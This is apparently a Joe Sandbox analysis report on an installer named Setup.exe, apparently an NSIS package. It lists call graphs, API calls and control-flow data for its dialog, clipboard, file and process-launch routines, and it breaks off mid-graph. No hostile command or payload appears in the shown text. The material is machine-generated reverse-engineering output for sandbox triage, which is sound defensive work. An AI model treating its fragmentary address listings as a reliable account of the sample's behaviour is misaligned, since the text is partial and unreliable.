401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4865 402da5 4866 4030e3 4865->4866 4867 402dac 4865->4867 4868 401446 18 API calls 4867->4868 4869 402db8 4868->4869 4870 402dbf SetFilePointer 4869->4870 4870->4866 4871 402dcf 4870->4871 4871->4866 4873 405f7d wsprintfW 4871->4873 4873->4866 4874 4049a8 GetDlgItem GetDlgItem 4875 4049fe 7 API calls 4874->4875 4880 404c16 4874->4880 4876 404aa2 DeleteObject 4875->4876 4877 404a96 SendMessageW 4875->4877 4878 404aad 4876->4878 4877->4876 4881 404ae4 4878->4881 4884 406831 18 API calls 4878->4884 4879 404cfb 4882 404da0 4879->4882 4883 404c09 4879->4883 4888 404d4a SendMessageW 4879->4888 4880->4879 4892 40487a 5 API calls 4880->4892 4905 404c86 4880->4905 4887 403d6b 19 API calls 4881->4887 4885 404db5 4882->4885 4886 404da9 SendMessageW 4882->4886 4889 403df6 8 API calls 4883->4889 4890 404ac6 SendMessageW SendMessageW 4884->4890 4897 404dc7 ImageList_Destroy 4885->4897 4898 404dce 4885->4898 4903 404dde 4885->4903 4886->4885 4893 404af8 4887->4893 4888->4883 4895 404d5f SendMessageW 4888->4895 4896 404f97 4889->4896 4890->4878 4891 404ced SendMessageW 4891->4879 4892->4905 4899 403d6b 19 API calls 4893->4899 4894 404f48 4894->4883 4904 404f5d ShowWindow GetDlgItem ShowWindow 4894->4904 4900 404d72 4895->4900 4897->4898 4901 404dd7 GlobalFree 4898->4901 4898->4903 4907 404b09 4899->4907 4909 404d83 SendMessageW 4900->4909 4901->4903 4902 404bd6 GetWindowLongW SetWindowLongW 4906 404bf0 4902->4906 4903->4894 4908 40141d 80 API calls 4903->4908 4918 404e10 4903->4918 4904->4883 4905->4879 4905->4891 4910 404bf6 ShowWindow 4906->4910 4911 404c0e 4906->4911 4907->4902 4913 404b65 SendMessageW 4907->4913 4914 404bd0 4907->4914 4916 404b93 SendMessageW 4907->4916 4917 404ba7 SendMessageW 4907->4917 4908->4918 4909->4882 4925 403dc4 SendMessageW 4910->4925 4926 403dc4 SendMessageW 4911->4926 4913->4907 4914->4902 4914->4906 4916->4907 4917->4907 4919 404e54 4918->4919 4922 404e3e SendMessageW 4918->4922 4920 404f1f InvalidateRect 4919->4920 4924 404ecd SendMessageW SendMessageW 4919->4924 4920->4894 4921 404f35 4920->4921 4923 4043d9 21 API calls 4921->4923 4922->4919 4923->4894 4924->4919 4925->4883 4926->4880 4927 4030a9 SendMessageW 4928 4030c2 InvalidateRect 4927->4928 4929 4030e3 4927->4929 4928->4929 3880 4038af #17 SetErrorMode OleInitialize 3881 406328 3 API calls 3880->3881 3882 4038f2 SHGetFileInfoW 3881->3882 3954 406035 lstrcpynW 3882->3954 3884 40391d GetCommandLineW 3955 406035 lstrcpynW 3884->3955 3886 40392f GetModuleHandleW 3887 403947 3886->3887 3888 405d32 CharNextW 3887->3888 3889 403956 CharNextW 3888->3889 3900 403968 3889->3900 3890 403a02 3891 403a21 GetTempPathW 3890->3891 3956 4037f8 3891->3956 3893 403a37 3895 403a3b GetWindowsDirectoryW lstrcatW 3893->3895 3896 403a5f DeleteFileW 3893->3896 3894 405d32 CharNextW 3894->3900 3898 4037f8 11 API calls 3895->3898 3964 4035b3 GetTickCount GetModuleFileNameW 3896->3964 3901 403a57 3898->3901 3899 403a73 3902 403af8 3899->3902 3904 405d32 CharNextW 3899->3904 3940 403add 3899->3940 3900->3890 3900->3894 3907 403a04 3900->3907 3901->3896 3901->3902 4049 403885 3902->4049 3908 403a8a 3904->3908 4056 406035 lstrcpynW 3907->4056 3919 403b23 lstrcatW lstrcmpiW 3908->3919 3920 403ab5 3908->3920 3909 403aed 3912 406113 9 API calls 3909->3912 3910 403bfa 3913 403c7d 3910->3913 3915 406328 3 API calls 3910->3915 3911 403b0d 3914 405ccc MessageBoxIndirectW 3911->3914 3912->3902 3916 403b1b ExitProcess 3914->3916 3918 403c09 3915->3918 3922 406328 3 API calls 3918->3922 3919->3902 3921 403b3f CreateDirectoryW SetCurrentDirectoryW 3919->3921 4057 4067aa 3920->4057 3924 403b62 3921->3924 3925 403b57 3921->3925 3926 403c12 3922->3926 4074 406035 lstrcpynW 3924->4074 4073 406035 lstrcpynW 3925->4073 3930 406328 3 API calls 3926->3930 3933 403c1b 3930->3933 3932 403b70 4075 406035 lstrcpynW 3932->4075 3934 403c69 ExitWindowsEx 3933->3934 3939 403c29 GetCurrentProcess 3933->3939 3934->3913 3938 403c76 3934->3938 3935 403ad2 4072 406035 lstrcpynW 3935->4072 3941 40141d 80 API calls 3938->3941 3943 403c39 3939->3943 3992 405958 3940->3992 3941->3913 3942 406831 18 API calls 3944 403b98 DeleteFileW 3942->3944 3943->3934 3945 403ba5 CopyFileW 3944->3945 3951 403b7f 3944->3951 3945->3951 3946 403bee 3947 406c94 42 API calls 3946->3947 3949 403bf5 3947->3949 3948 406c94 42 API calls 3948->3951 3949->3902 3950 406831 18 API calls 3950->3951 3951->3942 3951->3946 3951->3948 3951->3950 3953 403bd9 CloseHandle 3951->3953 4076 405c6b CreateProcessW 3951->4076 3953->3951 3954->3884 3955->3886 3957 406064 5 API calls 3956->3957 3958 403804 3957->3958 3959 40380e 3958->3959 3960 40674e 3 API calls 3958->3960 3959->3893 3961 403816 CreateDirectoryW 3960->3961 3962 405eab 2 API calls 3961->3962 3963 40382a 3962->3963 3963->3893 4079 405e7c GetFileAttributesW CreateFileW 3964->4079 3966 4035f3 3986 403603 3966->3986 4080 406035 lstrcpynW 3966->4080 3968 403619 4081 40677d lstrlenW 3968->4081 3972 40362a GetFileSize 3973 403726 3972->3973 3987 403641 3972->3987 4086 4032d2 3973->4086 3975 40372f 3977 40376b GlobalAlloc 3975->3977 3975->3986 4098 403368 SetFilePointer 3975->4098 3976 403336 ReadFile 3976->3987 4097 403368 SetFilePointer 3977->4097 3980 4037e9 3983 4032d2 6 API calls 3980->3983 3981 403786 3984 40337f 33 API calls 3981->3984 3982 40374c 3985 403336 ReadFile 3982->3985 3983->3986 3990 403792 3984->3990 3989 403757 3985->3989 3986->3899 3987->3973 3987->3976 3987->3980 3987->3986 3988 4032d2 6 API calls 3987->3988 3988->3987 3989->3977 3989->3986 3990->3986 3990->3990 3991 4037c0 SetFilePointer 3990->3991 3991->3986 3993 406328 3 API calls 3992->3993 3994 40596c 3993->3994 3995 405972 3994->3995 3996 405984 3994->3996 4112 405f7d wsprintfW 3995->4112 3997 405eff 3 API calls 3996->3997 3998 4059b5 3997->3998 4000 4059d4 lstrcatW 3998->4000 4002 405eff 3 API calls 3998->4002 4001 405982 4000->4001 4103 403ec1 4001->4103 4002->4000 4005 4067aa 18 API calls 4006 405a06 4005->4006 4007 405a9c 4006->4007 4009 405eff 3 API calls 4006->4009 4008 4067aa 18 API calls 4007->4008 4010 405aa2 4008->4010 4011 405a38 4009->4011 4012 405ab2 4010->4012 4013 406831 18 API calls 4010->4013 4011->4007 4015 405a5b lstrlenW 4011->4015 4018 405d32 CharNextW 4011->4018 4014 405ad2 LoadImageW 4012->4014 4114 403ea0 4012->4114 4013->4012 4016 405b92 4014->4016 4017 405afd RegisterClassW 4014->4017 4019 405a69 lstrcmpiW 4015->4019 4020 405a8f 4015->4020 4024 40141d 80 API calls 4016->4024 4022 405b9c 4017->4022 4023 405b45 SystemParametersInfoW CreateWindowExW 4017->4023 4025 405a56 4018->4025 4019->4020 4026 405a79 GetFileAttributesW 4019->4026 4028 40674e 3 API calls 4020->4028 4022->3909 4023->4016 4029 405b98 4024->4029 4025->4015 4030 405a85 4026->4030 4027 405ac8 4027->4014 4031 405a95 4028->4031 4029->4022 4032 403ec1 19 API calls 4029->4032 4030->4020 4033 40677d 2 API calls 4030->4033 4113 406035 lstrcpynW 4031->4113 4035 405ba9 4032->4035 4033->4020 4036 405bb5 ShowWindow LoadLibraryW 4035->4036 4037 405c38 4035->4037 4038 405bd4 LoadLibraryW 4036->4038 4039 405bdb GetClassInfoW 4036->4039 4040 405073 83 API calls 4037->4040 4038->4039 4041 405c05 DialogBoxParamW 4039->4041 4042 405bef GetClassInfoW RegisterClassW 4039->4042 4043 405c3e 4040->4043 4046 40141d 80 API calls 4041->4046 4042->4041 4044 405c42 4043->4044 4045 405c5a 4043->4045 4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                        Executed Functions

                                                                                                                                                                        Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.1802510496.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.1802494937.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802529503.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802545993.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.1802663000.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                        • API String ID: 2110491804-1641061399
                                                                                                                                                                        • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                        • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                        • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                        • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                        Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 